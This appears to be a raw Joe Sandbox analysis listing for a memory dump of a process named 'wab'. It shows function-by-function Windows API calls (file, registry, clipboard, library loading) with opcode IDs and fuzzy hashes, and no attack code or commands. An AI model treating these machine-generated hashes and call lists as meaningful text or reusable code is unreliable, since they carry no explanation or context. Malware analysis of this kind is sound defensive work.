                                      • Opcode ID: 102e9bd218bff8034664a90f9159d5d227e7736aeb8d0cece17e8d9bf5f2cb6a
                                      • Instruction ID: 35a9ad0fe6b4507ee66bae46934dcfd2e139bf0842d10804986ce3ee8b034d80
                                      • Opcode Fuzzy Hash: 102e9bd218bff8034664a90f9159d5d227e7736aeb8d0cece17e8d9bf5f2cb6a
                                      • Instruction Fuzzy Hash: BBF0A4311447126AE6306B7AAC02BE762849F00725F10862EB425D55D1EFA8D5C046AC
                                      APIs
                                      • SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                        • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: File$PointerRead
                                      • String ID:
                                      • API String ID: 3154509469-0
                                      • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                      • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                                      • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                      • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                                      APIs
                                      • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                        • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                        • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                        • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: PrivateProfile$StringWrite_itowmemset
                                      • String ID:
                                      • API String ID: 4232544981-0
                                      • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                      • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                                      • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                      • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                                      APIs
                                      • FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: FreeLibrary
                                      • String ID:
                                      • API String ID: 3664257935-0
                                      • Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                      • Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
                                      • Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                      • Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
                                      APIs
                                        • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                        • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                        • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                        • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                        • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                      • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: AddressProc$FileModuleName
                                      • String ID:
                                      • API String ID: 3859505661-0
                                      • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                      • Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
                                      • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                      • Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
                                      APIs
                                      • ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: FileRead
                                      • String ID:
                                      • API String ID: 2738559852-0
                                      • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                      • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                                      • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                      • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                                      APIs
                                      • WriteFile.KERNELBASE(?,00000009,?,00000000,00000000,?,?,00402F9B,?,00000000,00000000,00000000,0000017E), ref: 0040A325
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: FileWrite
                                      • String ID:
                                      • API String ID: 3934441357-0
                                      • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                      • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                                      • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                      • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                                      APIs
                                      • FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: FreeLibrary
                                      • String ID:
                                      • API String ID: 3664257935-0
                                      • Opcode ID: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                      • Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
                                      • Opcode Fuzzy Hash: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                      • Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: ??3@
                                      • String ID:
                                      • API String ID: 613200358-0
                                      • Opcode ID: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                      • Instruction ID: 84c58710a9e867f17c2d1ed9f7495b278bdfae561cd9e9721482330d0bfefd66
                                      • Opcode Fuzzy Hash: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                      • Instruction Fuzzy Hash: 48C00272510B018FEB209E16C405762B3E4AF5173BF928C1D949591481D77CE4448A1D
                                      APIs
                                      • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: CreateFile
                                      • String ID:
                                      • API String ID: 823142352-0
                                      • Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                      • Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
                                      • Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                      • Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
                                      APIs
                                      • CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: CreateFile
                                      • String ID:
                                      • API String ID: 823142352-0
                                      • Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                      • Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
                                      • Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                      • Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: ??3@
                                      • String ID:
                                      • API String ID: 613200358-0
                                      • Opcode ID: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                      • Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
                                      • Opcode Fuzzy Hash: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                      • Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: ??3@
                                      • String ID:
                                      • API String ID: 613200358-0
                                      • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                      • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                                      • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                      • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                                      APIs
                                      • FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: FreeLibrary
                                      • String ID:
                                      • API String ID: 3664257935-0
                                      • Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                      • Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
                                      • Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                      • Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28
                                      APIs
                                      • EnumResourceNamesW.KERNELBASE(?,?,Function_000148B6,00000000), ref: 0041494B
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: EnumNamesResource
                                      • String ID:
                                      • API String ID: 3334572018-0
                                      • Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                      • Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
                                      • Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                      • Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A
                                      APIs
                                      • FreeLibrary.KERNELBASE(?), ref: 0044DEB6
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: FreeLibrary
                                      • String ID:
                                      • API String ID: 3664257935-0
                                      • Opcode ID: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                      • Instruction ID: c12df66a07a312a107e4de7a98dbd39cb061029a89fa16cd2619b088cce9516a
                                      • Opcode Fuzzy Hash: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                      • Instruction Fuzzy Hash: 95C04C35D10311ABFB31AB11ED4975232A5BB00717F52006494128D065D7B8E454CB2D
                                      APIs
                                      • FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: CloseFind
                                      • String ID:
                                      • API String ID: 1863332320-0
                                      • Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                      • Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
                                      • Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                      • Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04
                                      APIs
                                      • RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: Open
                                      • String ID:
                                      • API String ID: 71445658-0
                                      • Opcode ID: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                      • Instruction ID: 4e31294bd56c0fd8f54a78566f459ab053e1b17b284f5820c9a90ca28514d216
                                      • Opcode Fuzzy Hash: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                      • Instruction Fuzzy Hash: C4C09B35544311BFDE114F40FD09F09BB61BB84B05F004414B254640B182714414EB17
                                      APIs
                                      • GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: AttributesFile
                                      • String ID:
                                      • API String ID: 3188754299-0
                                      • Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                      • Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
                                      • Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                      • Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: ??3@
                                      • String ID:
                                      • API String ID: 613200358-0
                                      • Opcode ID: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
                                      • Instruction ID: e7ff0dbf640816315c9486a8db62c76896ac9b8339bf6d895034c27267ad2de3
                                      • Opcode Fuzzy Hash: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
                                      • Instruction Fuzzy Hash: A5A022A200820023CC00AB3CCC02A0A33880EE323EB320B0EB032C20C2CF38C830B00E
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f464ccbab3ddc34ea334660331f976908ef01721c951a33d0f0b075526a08e67
                                      • Instruction ID: 186a7b248be49691fb09735f75239c469d17650efe27a5986e87276cb9a2b443
                                      • Opcode Fuzzy Hash: f464ccbab3ddc34ea334660331f976908ef01721c951a33d0f0b075526a08e67
                                      • Instruction Fuzzy Hash: E8318B31901616EFDF24AF25D8417DA73A0FF04314F10416BF91497251DB38ADE18BDA
                                      APIs
                                      • memset.MSVCRT ref: 004095FC
                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                        • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                                        • Part of subcall function 004091B8: memcpy.MSVCRT ref: 004092C9
                                        • Part of subcall function 004091B8: memcmp.MSVCRT ref: 004092D9
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                                      • String ID:
                                      • API String ID: 3655998216-0
                                      • Opcode ID: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                      • Instruction ID: 072a19641c33d96fdc78833b4ff670bebeeceb9371718ab52934a970b5968781
                                      • Opcode Fuzzy Hash: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                      • Instruction Fuzzy Hash: F311607290021D6AEF20A662DC4AE9B376CEF41318F10047BB908E51D2EA79DE548659
                                      APIs
                                      • memset.MSVCRT ref: 00445426
                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                        • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                        • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                      • String ID:
                                      • API String ID: 1828521557-0
                                      • Opcode ID: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                      • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                                      • Opcode Fuzzy Hash: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                      • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                                      APIs
                                        • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                        • Part of subcall function 004062A6: SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                      • memcpy.MSVCRT ref: 00406942
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: ??2@FilePointermemcpy
                                      • String ID:
                                      • API String ID: 609303285-0
                                      • Opcode ID: cfa0e116d589173c1f74b587a6cbbf9e28bf831d76649fdc759f8710e9f20be5
                                      • Instruction ID: a147fa8ec668463fbbadbca9a08a444fcb23aa95a0ceadfc627c4072e562ebd5
                                      • Opcode Fuzzy Hash: cfa0e116d589173c1f74b587a6cbbf9e28bf831d76649fdc759f8710e9f20be5
                                      • Instruction Fuzzy Hash: 4B11A7B2500108BBDB11A755C840F9F77ADDF85318F16807AF90677281C778AE2687A9
                                      APIs
                                        • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF,00406224,00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF), ref: 0040629C
                                        • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                      • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                        • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: File$CloseCreateErrorHandleLastRead
                                      • String ID:
                                      • API String ID: 2136311172-0
                                      • Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                      • Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
                                      • Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                      • Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
                                      APIs
                                        • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT ref: 0040B052
                                      • ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: ??2@??3@
                                      • String ID:
                                      • API String ID: 1936579350-0
                                      • Opcode ID: d9146978952df4032bb52ee1fc914549b8afd9994305f4c2f79ca13836f6df5d
                                      • Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
                                      • Opcode Fuzzy Hash: d9146978952df4032bb52ee1fc914549b8afd9994305f4c2f79ca13836f6df5d
                                      • Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8
                                      APIs
                                      • EmptyClipboard.USER32 ref: 004098EC
                                        • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                      • GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                      • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                      • GlobalFix.KERNEL32(00000000), ref: 00409927
                                      • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                      • GlobalUnWire.KERNEL32(00000000), ref: 0040994C
                                      • SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                      • GetLastError.KERNEL32 ref: 0040995D
                                      • CloseHandle.KERNEL32(?), ref: 00409969
                                      • GetLastError.KERNEL32 ref: 00409974
                                      • CloseClipboard.USER32 ref: 0040997D
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleReadSizeWire
                                      • String ID:
                                      • API String ID: 2565263379-0
                                      • Opcode ID: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                      • Instruction ID: b216396755dc4e0bfb1664a9ae46c4c33dbc75b884417c11e98c88a04b476fe2
                                      • Opcode Fuzzy Hash: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                      • Instruction Fuzzy Hash: 3D113D7A540204BBE7105FA6DC4CA9E7B78FB06356F10457AF902E22A1DB748901CB69
                                      APIs
                                      • LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                      • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                      • FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                      • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: Library$AddressFreeLoadMessageProc
                                      • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                      • API String ID: 2780580303-317687271
                                      • Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                      • Instruction ID: 703d86131c3dcb59aab6256491fb2853d543806c906e0642a055f98632e98cc8
